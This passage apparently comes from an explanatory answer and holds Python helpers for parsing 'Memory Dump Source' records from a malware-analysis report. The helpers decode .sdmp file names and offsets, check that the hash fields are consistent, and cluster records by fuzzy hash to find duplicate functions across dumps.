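def parse_dump_name(name):
    """Split an .sdmp file name into its dotted fields (meaning assumed, see top)."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"unexpected dump file name: {name}")
    proc, stage, dump_id, base, flags = m.groups()
    return {"proc_index": int(proc, 16), "stage": int(stage, 16),
            "dump_id": int(dump_id), "base": int(base, 16),
            "flags": [int(f, 16) for f in flags.strip(".").split(".")]}


def parse_records(text):
    """Return one dict per 'Memory Dump Source' record; labels and blanks are skipped."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
            records.append(cur)
        elif cur is None or not line.startswith((BULLET, "Uniqueness Score")):
            continue
        else:
            key, _, value = line.lstrip(BULLET).partition(":")
            key, value = key.strip().lower().replace(" ", "_"), value.strip()
            if key == "source_file":  # "<name>.sdmp, Offset: <hex>, based on PE: <bool>"
                name, offset, pe = [p.strip() for p in value.split(",")]
                cur["source_file"], cur["dump"] = name, parse_dump_name(name)
                cur["offset"] = int(offset.partition(":")[2].strip(), 16)
                cur["based_on_pe"] = pe.partition(":")[2].strip().lower() == "true"
            elif key == "uniqueness_score":
                cur[key] = float(value.rstrip("%"))
            else:
                cur[key] = value
    return records


def check_record(rec):
    """Consistency checks an analyst should run before trusting the hashes."""
    issues = []
    if rec.get("opcode_id") != rec.get("opcode_fuzzy_hash"):
        issues.append("opcode_id differs from opcode_fuzzy_hash")
    if rec["dump"]["base"] != rec["offset"]:
        issues.append("dump base address does not match Offset")
    for f in ("opcode_id", "instruction_id", "instruction_fuzzy_hash"):
        v = rec.get(f, "")
        if not v or not set(v) <= set(hexdigits):
            issues.append(f"{f} is missing or not hex")
    return issues


def cluster_by_hash(records, field="instruction_fuzzy_hash"):
    """Index records by a hash field; clusters of size > 1 are duplicate functions."""
    clusters = defaultdict(list)
    for r in records:
        clusters[r[field]].append(r["source_file"])
    return dict(clusters)
```

Feed `parse_records` the text of a whole function listing (or several reports concatenated) and `cluster_by_hash` will put identical functions from different dumps or samples into the same cluster; on the two records above every cluster has size one, and `check_record` returns no issues because the Opcode ID equals the Opcode Fuzzy Hash and the dump's base address matches the Offset in every record.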